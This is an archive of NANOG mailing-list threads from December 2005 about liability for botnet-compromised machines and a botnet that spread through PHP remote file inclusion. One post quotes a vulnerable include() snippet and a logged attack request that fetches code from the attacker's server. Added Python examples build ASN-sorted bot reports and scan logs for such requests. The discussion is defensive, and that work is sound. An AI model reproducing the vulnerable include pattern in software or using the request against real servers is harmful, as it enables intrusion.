Re: Compromised machines liable for damage?
I demand to immediately know who. But, I don't know why. Money talks on the Internet and I keep bathing in SBA quarters (note to Gadi: you won't get it, don't ask - North AMERICAN Net..). Damnit. Where's Kibo!?? I want my lava lamp back!

Marty

-Original Message-
From: Barry Shein [mailto:[EMAIL PROTECTED]]
Sent: Wed Dec 28 23:29:14 2005
To: NANOG
Subject: Re: Compromised machines liable for damage?

To beat a dead horse just a little harder the problem I have is when a certain company kept distributing software with security flaws specifically because they're profiting from those flaws.

For example, graphics libraries which accept binary code chunks to be executed in kernel mode without limits for support of quick screen updates in games considered of marketing importance. Blaming it on the games vendors seems inadequate, particularly over several years and releases of each.

That's just pure economics and, hence, profiting on others' serious pain.

--
-Barry Shein

The World | [EMAIL PROTECTED] | http://www.TheWorld.com
Purveyors to the Trade | Voice: 800-THE-WRLD | Login: Nationwide
Software Tool & Die | Public Access Internet | SINCE 1989 *oo*
Re: Compromised machines liable for damage?
We didn't want it the first time. Try network operations.

(rushes to finish the jc dill killfile entry)

-Original Message-
From: JC Dill [mailto:[EMAIL PROTECTED]]
Sent: Tue Dec 27 18:01:29 2005
To: NANOG
Subject: Re: Compromised machines liable for damage?

Here is the link again:

http://www.lectlaw.com/files/cur78.htm

Please spend some time reading that site to educate yourself about the facts and common misconceptions about this incident before you try any further analogies based on it.

In *this* case the injured woman had done most[1] of the reasonable things one should do to try to mitigate injury, but she was seriously injured and the seriousness of the injury was directly due to the product being defective. McDonalds was held liable because they knowingly and intentionally sold a defective product even after having over 700 prior incidents (serious burns) reported to them due to this defect (the coffee being too hot).

Jason Frisvold wrote:
> Still, a little common sense... Hot coffee of any type, between the legs, in a moving car? Umm.. even normal coffee still causes a jump of pain. That jump of pain could easily cause a car accident.

<quote>
Critics of civil justice, who have pounced on this case, often charge that Liebeck was driving the car or that the vehicle was in motion when she spilled the coffee; neither is true.
</quote>

The coffee wasn't just hot, it was much too hot to be safely consumed. Note that

<quote>
[if the] spill had involved coffee at 155 degrees, the liquid would have cooled and given her time to avoid a serious burn
</quote>

and

<quote>
The company admitted its customers were unaware that they could suffer third degree burns from the coffee and that a statement on the side of the cup was not a warning but a reminder since the location of the writing would not warn customers of the hazard.
</quote>

Now let us consider Microsoft's continued sales of defective Windows and IE software given their track record for failing to ensure that their product works safely and doesn't enable others to cause damage to the user's system and data or (of primary importance to the networking community) the systems and networks of others:

http://bcheck.scanit.be/bcheck/page.php?name=STATS2004

Even if the end user updates their Windows/IE software the minute a security update is available, their browser would still have been vulnerable for all but 7 days in 2004! I wonder how 2005 has been shaping up.

Hmmm. I wonder if Stella's lawyers would like to take on Microsoft

jc

[1] The jury awarded Liebeck $200,000 in compensatory damages. This amount was reduced to $160,000 because the jury found Liebeck 20 percent at fault in the spill. The jury also awarded Liebeck $2.7 million in punitive damages, which equals about two days of McDonalds' coffee sales. Post-verdict investigation found that the temperature of coffee at the local Albuquerque McDonalds had dropped to 158 degrees fahrenheit. The trial court subsequently reduced the punitive award to $480,000 -- or three times compensatory damages -- even though the judge called McDonalds' conduct reckless, callous and willful.
RE: Compromised machines liable for damage?
If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL).

I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion.

I think that angle is DOA.

Martin

-Original Message-
From: Joseph Jackson [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 03:13:02 2005
To: Hannigan, Martin
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also?

IE I am running some webserver software that a bug is found in it. Attackers use that bug in the software to generate a DOS attack against you from my machines. No update has been released for the software I am running and/or no warning has been released. You sue me I sue the coders. What a wonderful world.

(I'm not for this but it's another side of the issue.)

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Hannigan, Martin
Sent: Sunday, December 25, 2005 9:22 PM
To: Steven M. Bellovin
Cc: Dave Pooser; NANOG
Subject: Re: Compromised machines liable for damage?

Yes, I agree. As usual, I too am 'IANAL'.

Marty

-Original Message-
From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 23:52:27 2005
To: Hannigan, Martin
Cc: Dave Pooser; NANOG
Subject: Re: Compromised machines liable for damage?

In message [EMAIL PROTECTED] om, Hannigan, Martin writes:
> Dave, RIAA wins almost 100pct vs p2p'ers it sues. It's an interesting dichotomy.

Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation.

For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf

--Steven M. Bellovin, http://www.cs.columbia.edu/~smb
RE: Compromised machines liable for damage?
In the general sense, possibly, but where there are lawyers there is always discouragement. Suing people with no money is easy, but it does stop them from contributing in most cases. There are always a few who like getting sued.

RIAA has shown companies will widescale sue so your argument is suspect, IMO..

-Original Message-
From: Owen DeLong [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 23:11:13 2005
To: Hannigan, Martin; Joseph Jackson
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

I've seen this argument time and again, and, the reality is that it is absolutely false. In fact, it will do nothing but encourage freeware.

Liability for a product generally doesn't exist until money changes hands. If you design a piece of equipment and post the drawings in the public domain, you are not liable if someone builds it and harms themselves. You are liable if someone pays you for the design, because, the money changing hands creates a duty to care. Outside of a duty to care, the only opening for liability is if they can prove that you failed to take some precaution that would be expected of any reasonably prudent person.

So, liability for bad software and the consequences it creates would be bad for the Micr0$0ft and Oracles of the world, but, generally, very good for the Free Software movement. It might turn out to be bad for organizations like Cygnus and RedHat, but, that's more of a gray area.

As to the specific example cited... If no update has been released, in the case of Open Source, that's no excuse. You have the source, so, you don't have to wait for an update. In the case of closed software, then, I think manufacturer liability is a good thing for the industry in general.

Owen

--On December 26, 2005 10:07:20 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote:

If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL).

I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion.

I think that angle is DOA.

Martin

-Original Message-
From: Joseph Jackson [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 03:13:02 2005
To: Hannigan, Martin
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also?

IE I am running some webserver software that a bug is found in it. Attackers use that bug in the software to generate a DOS attack against you from my machines. No update has been released for the software I am running and/or no warning has been released. You sue me I sue the coders. What a wonderful world.

(I'm not for this but it's another side of the issue.)

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Hannigan, Martin
Sent: Sunday, December 25, 2005 9:22 PM
To: Steven M. Bellovin
Cc: Dave Pooser; NANOG
Subject: Re: Compromised machines liable for damage?

Yes, I agree. As usual, I too am 'IANAL'.

Marty

-Original Message-
From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 23:52:27 2005
To: Hannigan, Martin
Cc: Dave Pooser; NANOG
Subject: Re: Compromised machines liable for damage?

In message [EMAIL PROTECTED] om, Hannigan, Martin writes:
> Dave, RIAA wins almost 100pct vs p2p'ers it sues. It's an interesting dichotomy.

Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation.

For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf

--Steven M. Bellovin, http://www.cs.columbia.edu/~smb

--
If this message was not signed with gpg key 0FE2AA3D, it's probably a forgery.
RE: Compromised machines liable for damage?
Botnet code is open source, as far as I know. Maybe not by design, but I have gigs of it and it's all googleable.

Not being a lawyer, I'd guess the plaintiff size is highly debatable based on source or destination.

Marty

-Original Message-
From: Owen DeLong [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 23:32:04 2005
To: Hannigan, Martin; Joseph Jackson
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

RIAA is a very different context from what we are talking about here.

First, the number of people getting attacked from Open Source systems is very small, so, you have a very small class of plaintiffs. Second, said class of plaintiffs is probably not as well funded as RIAA.

OTOH, the number of people/organizations being attacked from Micr0$0ft based systems is relatively high, so, a large class of plaintiffs, and, some of them being enterprises are relatively well funded.

Second, in the case of RIAA, it is businesses suing to do what they perceive as protecting their profit stream, and, they know they are suing a collection of defendants that are relatively poorly funded and have no organization. In the case of Open Source, I think there is a pretty good track record of the community coming to the aid of those that get sued for various reasons (DeCSS comes to mind).

Sure, it's easy to sue someone who doesn't have any money, but, there's no point in doing so. Frankly, it's not the people with no money that are at risk here. It's the people with some money and some assets. If you have nothing, you're pretty safe ignoring a civil suit because you have nothing to lose.

Frankly, if RIAA were to sue me, it wouldn't cost me $250,000 to fight it. It might cost me a few thousand if I chose to involve a lawyer in some portion of the process, but, initially, I think I could make their life difficult enough to get them to go away without involving a lawyer. I've already made MPAA/Disney go away twice without a lawyer. Admittedly, they went away before even filing a suit, so, technically, I haven't been sued, but, I've been threatened by them, and, I'm sure if I'd buckled under or failed to confront them appropriately, I would have either gotten sued or ended up handing over money.

The costs of defending a suit are $0 until you hire a lawyer.

Owen

--On December 26, 2005 11:18:46 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote:

In the general sense, possibly, but where there are lawyers there is always discouragement. Suing people with no money is easy, but it does stop them from contributing in most cases. There are always a few who like getting sued.

RIAA has shown companies will widescale sue so your argument is suspect, IMO..

-Original Message-
From: Owen DeLong [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 23:11:13 2005
To: Hannigan, Martin; Joseph Jackson
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

I've seen this argument time and again, and, the reality is that it is absolutely false. In fact, it will do nothing but encourage freeware.

Liability for a product generally doesn't exist until money changes hands. If you design a piece of equipment and post the drawings in the public domain, you are not liable if someone builds it and harms themselves. You are liable if someone pays you for the design, because, the money changing hands creates a duty to care. Outside of a duty to care, the only opening for liability is if they can prove that you failed to take some precaution that would be expected of any reasonably prudent person.

So, liability for bad software and the consequences it creates would be bad for the Micr0$0ft and Oracles of the world, but, generally, very good for the Free Software movement. It might turn out to be bad for organizations like Cygnus and RedHat, but, that's more of a gray area.

As to the specific example cited... If no update has been released, in the case of Open Source, that's no excuse. You have the source, so, you don't have to wait for an update. In the case of closed software, then, I think manufacturer liability is a good thing for the industry in general.

Owen

--On December 26, 2005 10:07:20 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote:

If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL).

I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion.

I think that angle is DOA.

Martin

-Original Message-
From: Joseph Jackson [mailto:[EMAIL PROTECTED]]
Sent: Mon Dec 26 03:13:02 2005
To: Hannigan, Martin
Cc: NANOG
Subject: RE: Compromised machines liable for damage?

What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also?

IE I am running some webserver software
Re: Destructive botnet originating from Japan
What's nsp-sec?

-Original Message-
From: Richard A Steenbergen [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 04:25:15 2005
To: Gadi Evron
Cc: Rob Thomas; NANOG
Subject: Re: Destructive botnet originating from Japan

On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote:
> It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.

Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted.

On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too sekure to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :)

--
Richard A Steenbergen [EMAIL PROTECTED] http://www.e-gerbil.net/ras
GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
Re: Destructive botnet originating from Japan
(jon I know you didn't say, but the original must have got nailed in my spam filters)

The best thing about this statement is that since I don't report to nanog, nsp-sec, or Tyler Durden, the first rule of fight club can kiss my arse.

But then again, this really isn't NANOG's business now is it? Or is it?

Happy Christmas folks! :)

Marty

-Original Message-
From: Jon Lewis [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 17:37:57 2005
To: [EMAIL PROTECTED]
Cc: NANOG
Subject: Re: Destructive botnet originating from Japan

On Sun, 25 Dec 2005, Rubens Kuhl Jr. wrote:
> The first rule of nsp-sec is, you do not talk about nsp-sec
> The second rule of nsp-sec is, you DO NOT talk about nsp-sec

https://puck.nether.net/mailman/listinfo/nsp-security

There's nothing secret about the existence or purpose of the list. I don't know enough about Barrett to guess as to whether or not he'd qualify.

Also, I was considering emailing Barrett privately, but since there seems to be so much misinformation going around, others will probably benefit from this.

If you want to send out list of IPs suspected of being bots or really any other class of insecure/0wn3d systems, to make it easier for those who care to find their IPs in your list, run it through the Team Cymru whois server first.

http://www.cymru.com/BGP/whois.html

Then sort the list numerically by ASN. That way, people can scroll through it, or search by ASN, and quickly determine if there's any further action worth taking.

It's also a really good idea to include timestamps, ideally exact ones in GMT per IP. In this case (unix bots) it's not as likely, but typical windows bots frequently show up on end-user systems with dynamic IPs. Telling me one of my dial pool IPs was a bot recently is not as useful as telling me it was a bot 2005-12-25 02:30:45 GMT.

--
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_ http://www.lewis.org/~jlewis/pgp for PGP public key_
Re: Destructive botnet originating from California (was Japan)
How's the mitigation going? We can argue semantics at Dallas NANOG.

-Original Message-
From: Jon Lewis [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 22:23:19 2005
To: Barrett G. Lyon
Cc: NANOG
Subject: Re: Destructive botnet originating from California (was Japan)

On Sun, 25 Dec 2005, Barrett G. Lyon wrote:
> I would have sent out a clean list sorted via AS and IP, except I have been working from vacation on GPRS via my 1 bar of service on my cell phone.

What's vacation? I gather Prolexic isn't a one man shop. Nobody else had a better internet connection and a few minutes to tidy up the data and make the post?

> If the right thing is to post this information to a more private list, then I would do so. However, I think it has been beneficial to get this information out to the public where they can actually do something about it. I've been

I didn't say nanog wasn't a good place to post the info...or that there aren't better places. Just that if you want people to take action based on the data, present it in a more reader-friendly and meaningful format. Also, mixing IPs and PTRs in such a report is not a great idea. I actually did scan through the message looking for any of my prefixes and $work's primary domain name. If there was a PTR for some customer of ours in their own domain, I didn't see it, but I also didn't look for it. Posting data by ASN/IP totally avoids that issue and makes looking for your ASN(s) trivial.

> getting emails from a lot of people thanking for the posts because they were able to identify a lot of messy traffic on their network and put an end to it. Posting information like this to a private list may not have accomplished much.

I don't see a problem with posting it to both or as many appropriate lists as you can find. Nanog is kind of geo-specific though. Other lists might have much broader representation from the entire internet.

> This should be another thread completely, but I am wondering about the liability of the individuals who have owned machines that are attacking me/my clients. I'm not a lawyer but I would assume that tort liability law could apply and find someone liable for allowing their machine to DDoS people.

IANAL either, but if I steal your car and run someone over with it, are you liable? Should you be? Computers are stolen or at least commandeered on the internet at an alarming rate because those who do it know that odds are, they won't get caught. And if they are caught, odds are, nothing will happen. And there's apparently considerable profit in the sale of commandeered systems or services provided by them.

I doubt you'll get anywhere trying to make an example of someone whose system was hacked or even just used improperly. I really don't think this problem can be solved by scaring sysadmins or corporations. There will always be security holes.

--
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_ http://www.lewis.org/~jlewis/pgp for PGP public key_
Re: Destructive botnet originating from Japan
Prolexic qualifies. They do what MCI, ATT, Arbor, and others do regarding ddos mitigation and, IMHO, should be a shoo-in.

I was... subscribed and we are less valuable to the overall good so you decide (we do have presence there though). Verisign is not an SP. Critical infra is 'critical' (us) but the attacks come from you guys.

Whoever can help. I vote for realism.

Marty

-Original Message-
From: Jon Lewis [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 17:37:57 2005
To: [EMAIL PROTECTED]
Cc: NANOG
Subject: Re: Destructive botnet originating from Japan

On Sun, 25 Dec 2005, Rubens Kuhl Jr. wrote:
> The first rule of nsp-sec is, you do not talk about nsp-sec
> The second rule of nsp-sec is, you DO NOT talk about nsp-sec

https://puck.nether.net/mailman/listinfo/nsp-security

There's nothing secret about the existence or purpose of the list. I don't know enough about Barrett to guess as to whether or not he'd qualify.

Also, I was considering emailing Barrett privately, but since there seems to be so much misinformation going around, others will probably benefit from this.

If you want to send out list of IPs suspected of being bots or really any other class of insecure/0wn3d systems, to make it easier for those who care to find their IPs in your list, run it through the Team Cymru whois server first.

http://www.cymru.com/BGP/whois.html

Then sort the list numerically by ASN. That way, people can scroll through it, or search by ASN, and quickly determine if there's any further action worth taking.

It's also a really good idea to include timestamps, ideally exact ones in GMT per IP. In this case (unix bots) it's not as likely, but typical windows bots frequently show up on end-user systems with dynamic IPs. Telling me one of my dial pool IPs was a bot recently is not as useful as telling me it was a bot 2005-12-25 02:30:45 GMT.

--
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_ http://www.lewis.org/~jlewis/pgp for PGP public key_
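
The report format Jon Lewis describes in the message quoted above (and in the earlier reply in this thread), as an added example that is not part of any original post: map each sighting to its origin ASN, sort numerically by ASN, and give every IP an exact GMT timestamp. It assumes the pipe-separated layout of a verbose bulk reply from whois.cymru.com; the sample reply, addresses, ASNs and function names are constructed for illustration.

```python
"""Added example: turn raw bot sightings into an ASN-sorted, GMT-stamped report."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone


def build_bulk_query(ips):
    """Text to send to whois.cymru.com port 43 (bulk mode, verbose output)."""
    unique = sorted(set(ips), key=ipaddress.ip_address)
    return "begin\nverbose\n" + "\n".join(unique) + "\nend\n"


def parse_bulk_reply(text):
    """Map ip -> (asn, prefix, as_name) from a verbose bulk reply.

    Assumed row layout: AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name.
    Unrouted addresses carry "NA" in the AS column; asn is None for them.
    """
    table = {}
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("|")]
        if len(fields) < 7:
            continue  # banner line or blank line
        asn_field, ip, prefix, as_name = fields[0], fields[1], fields[2], fields[6]
        # A multi-origin prefix lists several ASNs; keep the first one.
        first = asn_field.split()[0] if asn_field else "NA"
        table[ip] = (int(first) if first.isdigit() else None, prefix, as_name)
    return table


def to_utc(stamp):
    """ISO 8601 timestamp with an offset -> 'YYYY-MM-DD HH:MM:SS GMT'."""
    dt = datetime.fromisoformat(stamp)
    if dt.tzinfo is None:
        # A local time without an offset cannot be matched to a DHCP/dial lease.
        raise ValueError(f"timestamp without UTC offset is ambiguous: {stamp}")
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S GMT")


def build_report(sightings, whois_table):
    """sightings: iterable of (ip, iso_timestamp). Returns the report lines."""
    by_asn = defaultdict(list)
    for ip, stamp in sightings:
        asn, prefix, name = whois_table.get(ip, (None, "NA", "NA"))
        by_asn[(asn, name)].append((ipaddress.ip_address(ip), to_utc(stamp), prefix))
    lines = []
    # Numeric ASN order (not string order); unrouted or unknown addresses last.
    for asn, name in sorted(by_asn, key=lambda k: (k[0] is None, k[0] or 0)):
        lines.append(f"AS{asn} {name}" if asn is not None else "ASN unknown")
        rows = sorted(by_asn[(asn, name)], key=lambda r: (r[0].version, int(r[0]), r[1]))
        for ip, when, prefix in rows:
            lines.append(f"  {ip}  {when}  ({prefix})")
    return lines


# Constructed sample data: documentation addresses, reserved/private-use ASNs.
SAMPLE_REPLY = """\
Bulk mode; whois.cymru.com [2005-12-25 03:00:00 +0000]
64500      | 203.0.113.7      | 203.0.113.0/24      | US | arin     | 2005-01-01 | EXAMPLE-B
4200000001 | 198.51.100.20    | 198.51.100.0/24     | US | arin     | 2005-01-01 | EXAMPLE-A
64500      | 203.0.113.200    | 203.0.113.0/24      | US | arin     | 2005-01-01 | EXAMPLE-B
NA         | 192.0.2.1        | NA                  | NA | NA       | NA         | NA
"""
SAMPLE_SIGHTINGS = [
    ("203.0.113.200", "2005-12-24T21:30:45-05:00"),  # sensor clock in US Eastern
    ("198.51.100.20", "2005-12-25T11:15:00+09:00"),  # sensor clock in JST
    ("203.0.113.7", "2005-12-25T02:30:45+00:00"),
    ("192.0.2.1", "2005-12-25T02:31:10+00:00"),
]

if __name__ == "__main__":
    print(build_bulk_query(ip for ip, _ in SAMPLE_SIGHTINGS), end="")
    print("\n".join(build_report(SAMPLE_SIGHTINGS, parse_bulk_reply(SAMPLE_REPLY))))
```

Sorting the ASN as an integer matters here: as strings, the ten-digit AS4200000001 would sort ahead of AS64500.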
RE: Compromised machines liable for damage?
Dave, RIAA wins almost 100pct vs p2p'ers it sues. It's an interesting dichotomy.

Marty

-Original Message-
From: Dave Pooser [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 23:09:02 2005
To: NANOG
Subject: Compromised machines liable for damage?

> This should be another thread completely, but I am wondering about the liability of the individuals who have owned machines that are attacking me/my clients.

As a practical matter, I'd expect it to be difficult to try. Convincing a jury that running a PHP version that's three months out of date constitutes gross negligence because you should have read about the vulnerability on the Web might be... tricky. Especially when you have to explain to the jury what PHP is. Dueling expert witnesses arguing about best practice, poor confused webmaster/Amway distributor looking bewildered at all this technical talk (I figgered I just buy Plesk and I was good to go. I dunno nothin' about PHP. Isn't that a drug?) Not to mention working out what percentage of the damages you suffered should come from each host.

But yeah, I'd like to see it tried. Lawyering up is one of our core competencies here in the USA; maybe we could use it for good instead of evil.

--
Dave Pooser
Manager of Information Services
Alford Media http://www.alfordmedia.com
Re: Compromised machines liable for damage?
Yes, I agree. As usual, I too am 'IANAL'.

Marty

-Original Message-
From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
Sent: Sun Dec 25 23:52:27 2005
To: Hannigan, Martin
Cc: Dave Pooser; NANOG
Subject: Re: Compromised machines liable for damage?

In message [EMAIL PROTECTED] om, Hannigan, Martin writes:
> Dave, RIAA wins almost 100pct vs p2p'ers it sues. It's an interesting dichotomy.

Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation.

For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf

--Steven M. Bellovin, http://www.cs.columbia.edu/~smb
RE: Re:Destructive botnet originating from Japan
You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)

-Original Message-
From: Barrett G. Lyon [mailto:[EMAIL PROTECTED]]
Sent: Fri Dec 23 19:21:47 2005
To: nanog@merit.edu
Subject: Re:Destructive botnet originating from Japan

Well it appears that bad code always seems to be the root of problems, according to our research today the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:

    index.php?test=test

    // vulnerable: the request parameter reaches include() unvalidated
    $test = $_GET['test'];
    include($test . ".php");

When the include executes the test string passed from the GET includes execution instructions:

    GET /index.php?test=http%3A//210.170.60.2/? HTTP/1.0 200 8010 - Wget/1.6

It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty.

-Barrett
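
One way to find requests like the one Barrett quotes in a web server's own access log, as an added example that is not part of the original post: flag any query parameter whose decoded value is a URL, and list the script/parameter pairs whose include() calls need auditing. It assumes common/combined log format; the sample log lines, addresses and function names are constructed for illustration.

```python
"""Added example: flag access-log requests that pass a URL as a query parameter."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common/combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A value that starts with scheme:// names a remote location, not a local page.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for a request carrying a URL-valued parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(value)  # parse_qsl has already decoded one layer
        if REMOTE_RE.match(value):
            hits.append((name, value))
    if not hits:
        return None
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "path": parts.path,
        "params": hits,
        # 200 means the script ran with this input; review those first.
        "status": int(m.group("status")),
    }


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f is not None]


def params_to_audit(findings):
    """Sorted (script path, parameter) pairs that received URL values."""
    return sorted({(f["path"], name) for f in findings for name, _ in f["params"]})


# Constructed sample log (documentation addresses), modelled on the quoted request.
SAMPLE_LOG = '''\
198.51.100.23 - - [23/Dec/2005:19:02:11 +0000] "GET /index.php?test=http%3A//192.0.2.80/? HTTP/1.0" 200 8010 "-" "Wget/1.6"
203.0.113.5 - - [23/Dec/2005:19:02:40 +0000] "GET /index.php?test=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [23/Dec/2005:19:03:02 +0000] "GET /gallery.php?page=http%253A%252F%252F192.0.2.80%252Fx&id=4 HTTP/1.0" 404 310 "-" "Wget/1.6"
203.0.113.9 - - [23/Dec/2005:19:04:10 +0000] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
    print(params_to_audit(scan_log(SAMPLE_LOG.splitlines())))
```

A legitimate redirect or link parameter will also match, so the list of pairs is a starting point for reading the code behind each script, not a verdict.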
RE: Bogon stupidity... warning... operational post.
On 12/22/05 1:35 PM, Christopher L. Morrow [EMAIL PROTECTED] wrote: On Thu, 22 Dec 2005, william(at)elan.net wrote: On Thu, 22 Dec 2005, Robert Boyle wrote: At 12:56 PM 12/22/2005, you wrote: P.S. 204/8 was not the only problem, there were problems with 128/8 and 133/8 as well so my apologies to people who may have noticed problems overnight. 199.128.0.0/9 too. Yes, legacy blocks (with large number of smaller allocations) whenever datasize during processing exceeded certain amount. The bad data was present at 2 of 4 servers for duration of the night but dns was being so 50+% of your system was hozed for some long period of time :( bad. changes same time as well, so I don't know how much affect there was but apparently considerable; this is the most serious problem in months. 'most serious problem in months' ... this has happened in smaller chunks during the past 'months' ? yikes... is that noted on your site so users of the 'service' will know what sorts of 'problems' they might be encountering due to their reliance on this 'service'? I wonder how many problems cymru has had in that period? I'm guess not so many... I mean this in a nice way, really. Look. Smiley. :) Use a blacklist, pay the price. I'd like to know how many people actually went to their boss and said It was that guy Williams fault even though I control and am responsible for the network.! -M
RE: Awful quiet?
Peter Dambier [EMAIL PROTECTED] writes: Used to have its IPv6 enabled. Gave me problems with connectivity. I dont have IPv6 to the outside so I had to disable the stack. Runs a lot smoother now. It tooks me week to get the IPv6 stack running in the first place. You've had quite the run of bad luck. My IPv6 stuff was working perfectly and with almost no effort. Until I lost an ethernet card in a VXR and snagged one from the IPv6 box as a spare, heh. Gotta get around to fixing that, but in the meantime no IPv6 on the colo LAN is not exactly an operational deal-killer. Once I turned on ipv6 on my Windows machine. It worked.
Biggest operational ISP in Israel?
Who is the biggest operational NSP in Israel? Thanks, Martin -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED]
RE: Deploying IPv6 in a datacenter (Was: Awful quiet?)
Kevin Day wrote: 9) Once we started publishing records for a few sites, we started getting complaints from some users that they couldn't reach the sites. It is possible that a broken 6to4 relay somewhere was causing problems. Running your own local 6to4 relay (rfc3068) will improve performance and reduce the chances of going through a broken one. Depending upon how many around the world non native tunnels are being utilized. Early on the RIPE folks warned me about tunnels. They were right. -M
RE: #nanog: was Re: http://weblog.disgu.st down
I'd like to see a useful #nanog where network operators could chat. About what? I'm on an IRC and we chat about off topic NANOG posts. Maybe this could chat about off topic IRC off topic NANOG posts? :-) Seriously, I think there is already a #nanog. -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
On Wed, Dec 21, 2005 at 04:43:58PM -0600, [EMAIL PROTECTED] wrote: Really? Where are the limits of BGP? Can you show me any numbers? You'd be the first. I'm not aware of any protocol inherent scaling brickwalls like with other protocols where certain timing constraints place limits (or thinking of L1 systems, you remember CSMA/CD?). Last time I checked, Ethernet is still CSMA/CD. Correct. And there you have minimum frame spacing requirements (IFG) and (e.g. with 10Base2 networks) minimum distance between stations attached to the bus to allow CSMA/CD work correctly. Interframe gap has no dependency on station vector. The dependency for CSMA/CD was bits on the wire and the algorithm backed off until it was free to transmit. Are you talking about something else? -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
